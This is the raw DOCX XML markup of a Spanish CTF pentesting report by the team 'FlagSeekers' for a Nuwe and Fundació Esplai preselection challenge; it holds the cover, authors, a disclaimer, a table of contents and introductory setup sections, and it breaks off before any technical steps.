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nil"/>
        </w:pBdr>
        <w:spacing w:lineRule="auto" w:line="192" w:before="200" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:u w:val="none" w:color="17375E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="0" allowOverlap="1" relativeHeight="4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>272415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="15951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12513" r="0" b="14169"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1595120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:u w:val="none" w:color="17375E"/>
        </w:rPr>
        <w:t>CYBERSECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:pBdr/>
        <w:spacing w:lineRule="auto" w:line="192" w:before="200" w:after="300"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:u w:val="none" w:color="17375E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:u w:val="none" w:color="17375E"/>
        </w:rPr>
        <w:t>RETO PRESELECCIÓN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="AA0716"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none" w:color="17375E"/>
        </w:rPr>
        <w:t>Informe de pentesting para la prueba de preselección organizada por Nuwe y Fundació Esplai</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v.0.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="480" w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Nombre de equipo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>FlagSeekers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Redactado por:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="2608" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Martín González Lora (rune_42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="2608" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>- Joaquín Monzón Vallecillo (colo13verdadeo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="2608" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>(sandru76)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:widowControl/>
        <w:pBdr/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="200"/>
        <w:ind w:hanging="0" w:left="2608" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright © 2021 Offensive Security Ltd. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Todos los derechos reservados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>El contenido de este informe es para uso exclusivo del personal organizador de la competición y será sujeto a su escrutinio y a las bases establecidas por dicho personal. Si fuere necesario, este informe será presentado ante notario para garantizar el cumplimiento de la normativa vigente. El uso para fines fraudulentos de las prácticas detalladas en este informe será debidamente notificado, denunciado y presentado ante las autoridades junto con las correspondientes evidencias.</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r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none" w:color="000000"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:t>Índice</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="true"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Enlacedelndice"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-2" \h</w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Enlacedelndice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="__RefHeading___Toc378_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>1.1 Presentación</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc380_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>1.2 Inventario</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc382_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>1.3 Preconfiguración</w:t>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc384_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>2.0 Resumen operativo</w:t>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc386_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>2.1 Recomendaciones</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc388_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.0 Metodologías</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc390_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.1 Obtención de información</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc392_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.2 Enumeración de servicios</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc394_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.3 Intrusión</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc396_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.4 Obtención de flags</w:t>
              <w:tab/>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc398_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>3.5 Finalización</w:t>
              <w:tab/>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="clear" w:pos="9340"/>
              <w:tab w:val="right" w:pos="9360" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc400_3166141552">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Enlacedelndice"/>
              </w:rPr>
              <w:t>4.0 Apéndices</w:t>
              <w:tab/>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="Enlacedelndice"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc59959346"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria" w:cs="Cambria" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:t xml:space="preserve">1.0 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
        <w:t>Introducción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc378_3166141552"/>
      <w:bookmarkStart w:id="2" w:name="_Toc59959347"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Presentación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este reto es un un CTF basado en pentesting </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="__RefHeading___Toc380_3166141552"/>
      <w:bookmarkStart w:id="4" w:name="_Toc59959348"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Inventario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>La organización nos ha provisto de los siguientes recursos para realizar la prueba:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Una máquina en formato OVA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichero de texto con una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Una serie de indicaciones provistas en el documento </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">guia-participantes.pdf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>para optimizar el uso de prácticas de escaneo, testeo e intrusión.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="__RefHeading___Toc382_3166141552"/>
      <w:bookmarkStart w:id="6" w:name="_Toc59959349"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preconfiguración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">Para realizar todo el reto de manera segura, se han seguido los siguientes pasos desde el equipo desde donde se ha ejecutado el ecosistema (en adelante, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>) formado por la máquina VMWare del reto (en adelante,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> target box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
